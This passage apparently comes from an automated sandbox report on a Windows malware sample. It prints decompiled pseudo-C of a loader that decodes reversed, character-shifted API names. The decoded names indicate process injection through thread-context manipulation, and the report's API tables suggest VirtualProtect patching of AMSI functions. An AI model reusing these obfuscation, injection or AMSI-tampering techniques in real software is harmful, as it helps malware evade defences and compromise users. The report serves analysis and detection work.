	_t266 = __edi;
	_t226 = __ebx + __eax - 0x35ad2fc;
	_t269 = _t270;
	_t230 = 0xf;
	do {
		_push(0);
		_push(0);
		_t230 = _t230 - 1;
	} while (_t230 != 0);
	_push(_t230);
	_push(_t226);
	_push(_t269);
	_push(0x35a66d6);
	_push( *[fs:eax]);
	*[fs:eax] = _t270;
	*0x35ad370 = *0x35ad370 - 1;
	_t273 = *0x35ad370;
	if( *0x35ad370 < 0) {
		L035A3FD0("kkc-12kdmqdj", _t226, &_v8, __edi, __esi, _t273);
		_t227 = LoadLibraryA(E035947DC(_v8));
		L035A3FD0("c`dqgSdltrdQ", _t227, &_v12, __edi, __esi, _t273);
		*0x35ad31c = GetProcAddress(_t227, E035947DC(_v12));
		L035A3FD0("xqnldLrrdbnqOc`dQ", _t227, &_v16, _t266, _t267, _t273);
		*0x35ad320 = GetProcAddress(_t227, E035947DC(_v16));
		L035A3FD0("xqnldLrrdbnqOdshqV", _t227, &_v20, _t266, _t267, _t273);
		*0x35ad300 = GetProcAddress(_t227, E035947DC(_v20));
		L035A3FD0("swdsmnBc`dqgSsdF", _t227, &_v24, _t266, _t267, _t273);
		*0x35ad324 = GetProcAddress(_t227, E035947DC(_v24));
		L035A3FD0("swdsmnBc`dqgSsdR", _t227, &_v28, _t266, _t267, _t273);
		*0x35ad318 = GetProcAddress(_t227, E035947DC(_v28));
		L035A3FD0("@rrdbnqOds`dqB", _t227, &_v32, _t266, _t267, _t273);
		*0x35ad328 = GetProcAddress(_t227, E035947DC(_v32));
		L035A3FD0("wDbnkk@k`tsqhU", _t227, &_v36, _t266, _t267, _t273);
		*0x35ad32c = GetProcAddress(_t227, E035947DC(_v36));
		L035A3FD0("@dbqtnrdQcmhE", _t227, &_v40, _t266, _t267, _t273);
		*0x35ad304 = GetProcAddress(_t227, E035947DC(_v40));
		L035A3FD0("dbqtnrdQendyhR", _t227, &_v44, _t266, _t267, _t273);
		*0x35ad308 = GetProcAddress(_t227, E035947DC(_v44));
		L035A3FD0("dbqtnrdQc`nK", _t227, &_v48, _t266, _t267, _t273);
		*0x35ad30c = GetProcAddress(_t227, E035947DC(_v48));
		L035A3FD0("dbqtnrdQjbnK", _t227, &_v52, _t266, _t267, _t273);
		*0x35ad310 = GetProcAddress(_t227, E035947DC(_v52));
		L035A3FD0("dbqtnrdQddqE", _t227, &_v56, _t266, _t267, _t273);
		*0x35ad314 = GetProcAddress(_t227, E035947DC(_v56));
		L035A3FD0("@rdl`MdbqtnrdQltmD", _t227, &_v60, _t266, _t267, _t273);
		*0x35ad330 = GetProcAddress(_t227, E035947DC(_v60));
		L035A3FD0("@xqnsbdqhCldsrxRsdF", _t227, &_v64, _t266, _t267, _t273);
		*0x35ad334 = GetProcAddress(_t227, E035947DC(_v64));
		L035A3FD0("@gs`OoldSsdF", _t227, &_v68, _t266, _t267, _t273);
		*0x35ad338 = GetProcAddress(_t227, E035947DC(_v68));
		L035A3FD0("@xqnsbdqhCrvncmhVsdF", _t227, &_v72, _t266, _t267, _t273);
		*0x35ad33c = GetProcAddress(_t227, E035947DC(_v72));
		L035A3FD0("dcnLqnqqDsdR", _t227, &_v76, _t266, _t267, _t273);
		*0x35ad340 = GetProcAddress(_t227, E035947DC(_v76));
		L035A3FD0("@dmhKcm`llnBsdF", _t227, &_v80, _t266, _t267, _t273);
		*0x35ad344 = GetProcAddress(_t227, E035947DC(_v80));
		L035A3FD0("@dkhEdsdkdC", _t227, &_v84, _t266, _t267, _t273);
		*0x35ad348 = GetProcAddress(_t227, E035947DC(_v84));
		L035A3FD0("@dkhEds`dqB", _t227, &_v88, _t266, _t267, _t273);
		*0x35ad34c = GetProcAddress(_t227, E035947DC(_v88));
		L035A3FD0("dkhEc`dQ", _t227, &_v92, _t266, _t267, _t273);
		*0x35ad350 = GetProcAddress(_t227, E035947DC(_v92));
		L035A3FD0("dkhEdshqV", _t227, &_v96, _t266, _t267, _t273);
		*0x35ad354 = GetProcAddress(_t227, E035947DC(_v96));
		L035A3FD0("dkcm`GdrnkB", _t227, &_v100, _t266, _t267, _t273);
		*0x35ad358 = GetProcAddress(_t227, E035947DC(_v100));
		L035A3FD0("qdsmhnOdkhEsdR", _t227, &_v104, _t266, _t267, _t273);
		*0x35ad35c = GetProcAddress(_t227, E035947DC(_v104));
		L035A3FD0("kkc-okgdf`lh", _t227, &_v108, _t266, _t267, _t273);
		_t199 = LoadLibraryA(E035947DC(_v108)); // executed
		_t228 = _t199;
		L035A3FD0("rsrhwDgs`OxqnsbdqhCdqtRdj`L", _t228, &_v112, _t266, _t267, _t273);
		*0x35ad360 = GetProcAddress(_t228, E035947DC(_v112));
		L035A3FD0("kkc-12kkdgr", _t228, &_v116, _t266, _t267, _t273);
		_t229 = LoadLibraryA(E035947DC(_v116));
		L035A3FD0("@dstbdwDkkdgR", _t229, &_v120, _t266, _t267, _t273);
		*0x35ad364 = GetProcAddress(_t229, E035947DC(_v120));
		L035A3FD0("@dka`stbdwDcmhE", _t229, &_v124, _t266, _t267, _t273);
		*0x35ad368 = GetProcAddress(_t229, E035947DC(_v124));
		L035A3FD0("@gs`OqdcknEk`hbdoRsdFGR", _t229, &_v128, _t266, _t267, _t273);
		*0x35ad36c = GetProcAddress(_t229, E035947DC(_v128));
	}
	_pop(_t233);
	*[fs:eax] = _t233;
	_push(E035A66DD);
	return E03594360( &_v128, 0x1f);
}

                                                                            0x035a6613
                                                                            0x035a6618
                                                                            0x035a6622
                                                                            0x035a6636
                                                                            0x035a6643
                                                                            0x035a6656
                                                                            0x035a6660
                                                                            0x035a6674
                                                                            0x035a6681
                                                                            0x035a6695
                                                                            0x035a66a2
                                                                            0x035a66b6
                                                                            0x035a66b6
                                                                            0x035a66bd
                                                                            0x035a66c0
                                                                            0x035a66c3
                                                                            0x035a66d5

                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,035A66D6,?,?,0000000E,00000000,00000000), ref: 035A62DE
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A62FC
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A631D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A633E
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A635F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6380
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63A1
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63C2
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63E3
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6404
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6425
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6446
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6467
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6488
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64A9
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64CA
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64EB
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A650C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A652D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A654E
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A656F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6590
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65B1
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65D2
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65F3
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6613
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6631
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6651
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A666F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6690
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A66B1
                                                                            Strings
                                                                            • swdsmnBc`dqgSsdF , xrefs: 035A634B
                                                                            • @dbqtnrdQcmhE , xrefs: 035A63CF
                                                                            • dbqtnrdQjbnK , xrefs: 035A6432
                                                                            • @gs`OqdcknEk`hbdoRsdFGR , xrefs: 035A669D
                                                                            • @dkhEds`dqB , xrefs: 035A655B
                                                                            • @dka`stbdwDcmhE , xrefs: 035A667C
                                                                            • @rdl`MdbqtnrdQltmD , xrefs: 035A6474
                                                                            • dkhEc`dQ , xrefs: 035A657C
                                                                            • wDbnkk@k`tsqhU , xrefs: 035A63AE
                                                                            • dkcm`GdrnkB , xrefs: 035A65BE
                                                                            • dkhEdshqV , xrefs: 035A659D
                                                                            • xqnldLrrdbnqOdshqV , xrefs: 035A632A
                                                                            • dcnLqnqqDsdR , xrefs: 035A64F8
                                                                            • xqnldLrrdbnqOc`dQ , xrefs: 035A6309
                                                                            • @xqnsbdqhCrvncmhVsdF , xrefs: 035A64D7
                                                                            • c`dqgSdltrdQ , xrefs: 035A62E8
                                                                            • @gs`OoldSsdF , xrefs: 035A64B6
                                                                            • kkc-12kkdgr , xrefs: 035A663E
                                                                            • dbqtnrdQc`nK , xrefs: 035A6411
                                                                            • dbqtnrdQendyhR , xrefs: 035A63F0
                                                                            • @dstbdwDkkdgR , xrefs: 035A665B
                                                                            • @dmhKcm`llnBsdF , xrefs: 035A6519
                                                                            • kkc-okgdf`lh , xrefs: 035A6600
                                                                            • qdsmhnOdkhEsdR , xrefs: 035A65DF
                                                                            • dbqtnrdQddqE , xrefs: 035A6453
                                                                            • @xqnsbdqhCldsrxRsdF , xrefs: 035A6495
                                                                            • @dkhEdsdkdC , xrefs: 035A653A
                                                                            • kkc-12kdmqdj , xrefs: 035A62CB
                                                                            • @rrdbnqOds`dqB , xrefs: 035A638D
                                                                            • rsrhwDgs`OxqnsbdqhCdqtRdj`L , xrefs: 035A661D
                                                                            • swdsmnBc`dqgSsdR , xrefs: 035A636C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp Download File
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: @dbqtnrdQcmhE$@dka`stbdwDcmhE$@dkhEds`dqB$@dkhEdsdkdC$@dmhKcm`llnBsdF$@dstbdwDkkdgR$@gs`OoldSsdF$@gs`OqdcknEk`hbdoRsdFGR$@rdl`MdbqtnrdQltmD$@rrdbnqOds`dqB$@xqnsbdqhCldsrxRsdF$@xqnsbdqhCrvncmhVsdF$c`dqgSdltrdQ$dbqtnrdQc`nK$dbqtnrdQddqE$dbqtnrdQendyhR$dbqtnrdQjbnK$dcnLqnqqDsdR$dkcm`GdrnkB$dkhEc`dQ$dkhEdshqV$kkc-12kdmqdj$kkc-12kkdgr$kkc-okgdf`lh$qdsmhnOdkhEsdR$rsrhwDgs`OxqnsbdqhCdqtRdj`L$swdsmnBc`dqgSsdF$swdsmnBc`dqgSsdR$wDbnkk@k`tsqhU$xqnldLrrdbnqOc`dQ$xqnldLrrdbnqOdshqV
                                                                            • API String ID: 2238633743-988113358
                                                                            • Opcode ID: 3b446dd141fdec25e44cff90a661e9dea7204630a88db79e49681c22ef0c1e79
                                                                            • Instruction ID: 3db9b3665fa3da4963f15c0623acd80d0e2130a70bc7a88ac71b6d56e0892bae
                                                                            • Opcode Fuzzy Hash: 3b446dd141fdec25e44cff90a661e9dea7204630a88db79e49681c22ef0c1e79
                                                                            • Instruction Fuzzy Hash: E6B193B8A1070AAFDB00FBB9FC9089FB7F8BB84254F144516B4019F635DB745D06ABA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
/* The string literals below are DLL and export names stored reversed with each
   character shifted down by one: "kkc-12kdmqdj" is "kernel32.dll" and
   "c`dqgSdltrdQ" is "ResumeThread". */
E035A629C(void* __ebx, void* __edi, void* __esi) {
    char _v8;
    char _v12;
    char _v16;
    char _v20;
    char _v24;
    char _v28;
    char _v32;
    char _v36;
    char _v40;
    char _v44;
    char _v48;
    char _v52;
    char _v56;
    char _v60;
    char _v64;
    char _v68;
    char _v72;
    char _v76;
    char _v80;
    char _v84;
    char _v88;
    char _v92;
    char _v96;
    char _v100;
    char _v104;
    char _v108;
    char _v112;
    char _v116;
    char _v120;
    char _v124;
    char _v128;
    struct HINSTANCE__* _t197;
    struct HINSTANCE__* _t224;
    struct HINSTANCE__* _t225;
    struct HINSTANCE__* _t226;
    void* _t227;
    intOrPtr _t230;
    intOrPtr _t266;
    intOrPtr _t267;

    _t264 = __esi;
    _t263 = __edi;
    _t266 = _t267;
    _t227 = 0xf;
    do {
        _push(0);
        _push(0);
        _t227 = _t227 - 1;
    } while (_t227 != 0);
    _push(_t227);
    _push(__ebx);
    _push(_t266);
    _push(0x35a66d6);
    _push( *[fs:eax]);
    *[fs:eax] = _t267;
    *0x35ad370 = *0x35ad370 - 1;
    _t269 = *0x35ad370;
    if( *0x35ad370 < 0) {
        L035A3FD0("kkc-12kdmqdj", __ebx, &_v8, __edi, __esi, _t269);
        _t224 = LoadLibraryA(E035947DC(_v8));
        L035A3FD0("c`dqgSdltrdQ", _t224, &_v12, __edi, __esi, _t269);
        *0x35ad31c = GetProcAddress(_t224, E035947DC(_v12));
        L035A3FD0("xqnldLrrdbnqOc`dQ", _t224, &_v16, __edi, __esi, _t269);
        *0x35ad320 = GetProcAddress(_t224, E035947DC(_v16));
        L035A3FD0("xqnldLrrdbnqOdshqV", _t224, &_v20, _t263, _t264, _t269);
        *0x35ad300 = GetProcAddress(_t224, E035947DC(_v20));
        L035A3FD0("swdsmnBc`dqgSsdF", _t224, &_v24, _t263, _t264, _t269);
        *0x35ad324 = GetProcAddress(_t224, E035947DC(_v24));
        L035A3FD0("swdsmnBc`dqgSsdR", _t224, &_v28, _t263, _t264, _t269);
        *0x35ad318 = GetProcAddress(_t224, E035947DC(_v28));
        L035A3FD0("@rrdbnqOds`dqB", _t224, &_v32, _t263, _t264, _t269);
        *0x35ad328 = GetProcAddress(_t224, E035947DC(_v32));
        L035A3FD0("wDbnkk@k`tsqhU", _t224, &_v36, _t263, _t264, _t269);
        *0x35ad32c = GetProcAddress(_t224, E035947DC(_v36));
        L035A3FD0("@dbqtnrdQcmhE", _t224, &_v40, _t263, _t264, _t269);
        *0x35ad304 = GetProcAddress(_t224, E035947DC(_v40));
        L035A3FD0("dbqtnrdQendyhR", _t224, &_v44, _t263, _t264, _t269);
        *0x35ad308 = GetProcAddress(_t224, E035947DC(_v44));
        L035A3FD0("dbqtnrdQc`nK", _t224, &_v48, _t263, _t264, _t269);
        *0x35ad30c = GetProcAddress(_t224, E035947DC(_v48));
        L035A3FD0("dbqtnrdQjbnK", _t224, &_v52, _t263, _t264, _t269);
        *0x35ad310 = GetProcAddress(_t224, E035947DC(_v52));
        L035A3FD0("dbqtnrdQddqE", _t224, &_v56, _t263, _t264, _t269);
        *0x35ad314 = GetProcAddress(_t224, E035947DC(_v56));
        L035A3FD0("@rdl`MdbqtnrdQltmD", _t224, &_v60, _t263, _t264, _t269);
        *0x35ad330 = GetProcAddress(_t224, E035947DC(_v60));
        L035A3FD0("@xqnsbdqhCldsrxRsdF", _t224, &_v64, _t263, _t264, _t269);
        *0x35ad334 = GetProcAddress(_t224, E035947DC(_v64));
        L035A3FD0("@gs`OoldSsdF", _t224, &_v68, _t263, _t264, _t269);
        *0x35ad338 = GetProcAddress(_t224, E035947DC(_v68));
        L035A3FD0("@xqnsbdqhCrvncmhVsdF", _t224, &_v72, _t263, _t264, _t269);
        *0x35ad33c = GetProcAddress(_t224, E035947DC(_v72));
        L035A3FD0("dcnLqnqqDsdR", _t224, &_v76, _t263, _t264, _t269);
        *0x35ad340 = GetProcAddress(_t224, E035947DC(_v76));
        L035A3FD0("@dmhKcm`llnBsdF", _t224, &_v80, _t263, _t264, _t269);
        *0x35ad344 = GetProcAddress(_t224, E035947DC(_v80));
        L035A3FD0("@dkhEdsdkdC", _t224, &_v84, _t263, _t264, _t269);
        *0x35ad348 = GetProcAddress(_t224, E035947DC(_v84));
        L035A3FD0("@dkhEds`dqB", _t224, &_v88, _t263, _t264, _t269);
        *0x35ad34c = GetProcAddress(_t224, E035947DC(_v88));
        L035A3FD0("dkhEc`dQ", _t224, &_v92, _t263, _t264, _t269);
        *0x35ad350 = GetProcAddress(_t224, E035947DC(_v92));
        L035A3FD0("dkhEdshqV", _t224, &_v96, _t263, _t264, _t269);
        *0x35ad354 = GetProcAddress(_t224, E035947DC(_v96));
        L035A3FD0("dkcm`GdrnkB", _t224, &_v100, _t263, _t264, _t269);
        *0x35ad358 = GetProcAddress(_t224, E035947DC(_v100));
        L035A3FD0("qdsmhnOdkhEsdR", _t224, &_v104, _t263, _t264, _t269);
        *0x35ad35c = GetProcAddress(_t224, E035947DC(_v104));
        L035A3FD0("kkc-okgdf`lh", _t224, &_v108, _t263, _t264, _t269);
        _t197 = LoadLibraryA(E035947DC(_v108)); // executed
        _t225 = _t197;
        L035A3FD0("rsrhwDgs`OxqnsbdqhCdqtRdj`L", _t225, &_v112, _t263, _t264, _t269);
        *0x35ad360 = GetProcAddress(_t225, E035947DC(_v112));
        L035A3FD0("kkc-12kkdgr", _t225, &_v116, _t263, _t264, _t269);
        _t226 = LoadLibraryA(E035947DC(_v116));
        L035A3FD0("@dstbdwDkkdgR", _t226, &_v120, _t263, _t264, _t269);
        *0x35ad364 = GetProcAddress(_t226, E035947DC(_v120));
        L035A3FD0("@dka`stbdwDcmhE", _t226, &_v124, _t263, _t264, _t269);
        *0x35ad368 = GetProcAddress(_t226, E035947DC(_v124));
        L035A3FD0("@gs`OqdcknEk`hbdoRsdFGR", _t226, &_v128, _t263, _t264, _t269);
        *0x35ad36c = GetProcAddress(_t226, E035947DC(_v128));
    }
    _pop(_t230);
    *[fs:eax] = _t230;
    _push(E035A66DD);
    return E03594360( &_v128, 0x1f);
}


                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,035A66D6,?,?,0000000E,00000000,00000000), ref: 035A62DE
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A62FC
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A631D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A633E
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A635F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6380
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63A1
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63C2
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A63E3
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6404
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6425
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6446
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6467
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6488
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64A9
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64CA
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A64EB
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A650C
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A652D
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A654E
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A656F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6590
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65B1
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65D2
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A65F3
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6613
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6631
                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 035A6651
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A666F
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A6690
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A66B1
                                                                            Strings
                                                                            • swdsmnBc`dqgSsdF , xrefs: 035A634B
                                                                            • @dbqtnrdQcmhE , xrefs: 035A63CF
                                                                            • dbqtnrdQjbnK , xrefs: 035A6432
                                                                            • @gs`OqdcknEk`hbdoRsdFGR , xrefs: 035A669D
                                                                            • @dkhEds`dqB , xrefs: 035A655B
                                                                            • @dka`stbdwDcmhE , xrefs: 035A667C
                                                                            • @rdl`MdbqtnrdQltmD , xrefs: 035A6474
                                                                            • dkhEc`dQ , xrefs: 035A657C
                                                                            • wDbnkk@k`tsqhU , xrefs: 035A63AE
                                                                            • dkcm`GdrnkB , xrefs: 035A65BE
                                                                            • dkhEdshqV , xrefs: 035A659D
                                                                            • xqnldLrrdbnqOdshqV , xrefs: 035A632A
                                                                            • dcnLqnqqDsdR , xrefs: 035A64F8
                                                                            • xqnldLrrdbnqOc`dQ , xrefs: 035A6309
                                                                            • @xqnsbdqhCrvncmhVsdF , xrefs: 035A64D7
                                                                            • c`dqgSdltrdQ , xrefs: 035A62E8
                                                                            • @gs`OoldSsdF , xrefs: 035A64B6
                                                                            • kkc-12kkdgr , xrefs: 035A663E
                                                                            • dbqtnrdQc`nK , xrefs: 035A6411
                                                                            • dbqtnrdQendyhR , xrefs: 035A63F0
                                                                            • @dstbdwDkkdgR , xrefs: 035A665B
                                                                            • @dmhKcm`llnBsdF , xrefs: 035A6519
                                                                            • kkc-okgdf`lh , xrefs: 035A6600
                                                                            • qdsmhnOdkhEsdR , xrefs: 035A65DF
                                                                            • dbqtnrdQddqE , xrefs: 035A6453
                                                                            • @xqnsbdqhCldsrxRsdF , xrefs: 035A6495
                                                                            • @dkhEdsdkdC , xrefs: 035A653A
                                                                            • kkc-12kdmqdj , xrefs: 035A62CB
                                                                            • @rrdbnqOds`dqB , xrefs: 035A638D
                                                                            • rsrhwDgs`OxqnsbdqhCdqtRdj`L , xrefs: 035A661D
                                                                            • swdsmnBc`dqgSsdR , xrefs: 035A636C
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.352102663.0000000003591000.00000020.00000001.sdmp, Offset: 03590000, based on PE: true
                                                                            • Associated: 0000000A.00000002.352092901.0000000003590000.00000002.00000001.sdmp
                                                                            • Associated: 0000000A.00000002.352129882.00000000035A8000.00000004.00000001.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoad
                                                                            • String ID: @dbqtnrdQcmhE$@dka`stbdwDcmhE$@dkhEds`dqB$@dkhEdsdkdC$@dmhKcm`llnBsdF$@dstbdwDkkdgR$@gs`OoldSsdF$@gs`OqdcknEk`hbdoRsdFGR$@rdl`MdbqtnrdQltmD$@rrdbnqOds`dqB$@xqnsbdqhCldsrxRsdF$@xqnsbdqhCrvncmhVsdF$c`dqgSdltrdQ$dbqtnrdQc`nK$dbqtnrdQddqE$dbqtnrdQendyhR$dbqtnrdQjbnK$dcnLqnqqDsdR$dkcm`GdrnkB$dkhEc`dQ$dkhEdshqV$kkc-12kdmqdj$kkc-12kkdgr$kkc-okgdf`lh$qdsmhnOdkhEsdR$rsrhwDgs`OxqnsbdqhCdqtRdj`L$swdsmnBc`dqgSsdF$swdsmnBc`dqgSsdR$wDbnkk@k`tsqhU$xqnldLrrdbnqOc`dQ$xqnldLrrdbnqOdshqV
                                                                            • API String ID: 2238633743-988113358
                                                                            • Opcode ID: ff146f615586b97877e1e8ad7ce169a9605353ce4f02d3a9603a7fb1f0f0184a
                                                                            • Instruction ID: 2b5fd27d89ef1b51d2f228657cce057568a7145288ea809198bcc089c2e4706c
                                                                            • Opcode Fuzzy Hash: ff146f615586b97877e1e8ad7ce169a9605353ce4f02d3a9603a7fb1f0f0184a
                                                                            • Instruction Fuzzy Hash: 3FB193B8A1070AAFDB00FBB9FC9089FB7F8BB84254F144516B4019F635DB745D06ABA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                              • Part of subcall function 035A3CC8: RegCloseKey.ADVAPI32(10000000,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CDC
                                                                              • Part of subcall function 035A3D2C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000,035A3E31), ref: 035A3DA6
                                                                              • Part of subcall function 035A3C98: RegFlushKey.ADVAPI32(00010000,035A3BC8,035A3CEF,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CA9
                                                                              • Part of subcall function 035A3C98: RegCloseKey.ADVAPI32(00010000,035A3BC8,035A3CEF,035A3BC8,00000001,035A3C46,?,?,035A6F5D), ref: 035A3CB2
                                                                              • Part of subcall function 035A552C: LoadLibraryA.KERNEL32(00000000,00000000,035A55B1,?,?,00000000), ref: 035A5565
                                                                              • Part of subcall function 035A552C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,035A55B1,?,?,00000000), ref: 035A556D
                                                                              • Part of subcall function 035A552C: GetProcAddress.KERNEL32(00000000,00000000), ref: 035A558F
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54,00000008,00000040,00000000,00000000), ref: 035A70DF
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040,00000000,00000000,DllRegisterServer,035A4E54), ref: 035A7107
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035AD3D4,035A4E54,00000008,00000040), ref: 035A712F
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A7157
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A717F
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A71A7
                                                                            • LoadLibraryA.KERNEL32(softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040), ref: 035A71B1
                                                                            • GetProcAddress.KERNEL32(00000000,DriverInitializePolicy), ref: 035A71BE
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620,035A4E54), ref: 035A71D7
                                                                            • LoadLibraryA.KERNEL32(wuapi,035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008,00000040,738C4620,035A4E54,00000008,00000040,738C4620), ref: 035A72CB
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A72EF
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008,00000040,738C4620,00000000,DriverInitializePolicy,softpub,035A4E54,00000008), ref: 035A7308
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 035A732A
                                                                            • VirtualProtect.KERNEL32(035A4E54,00000008,00000040,7763B230,00000000,00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008,00000040), ref: 035A7343
                                                                            • ExitProcess.KERNEL32(00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,035A4E54,00000008,00000040,7763B230,00000000,00000000,wuapi,035A4E54,00000008), ref: 035A75AC
                                                                              • Part of subcall function 035A48A8: CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A48ED
                                                                              • Part of subcall function 035A48A8: ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 035A490E
                                                                            Strings
                                                                            • AmsiOpenSession , xrefs: 035A707B, 035A7451
                                                                            • wuapi , xrefs: 035A72C6
                                                                            • revreSretsigeRllD , xrefs: 035A72D8
                                                                            • DllRegisterServer , xrefs: 035A74BA, 035A7523
                                                                            • DllCanUnloadNow , xrefs: 035A7569
                                                                            • AmsiInitialize , xrefs: 035A7500
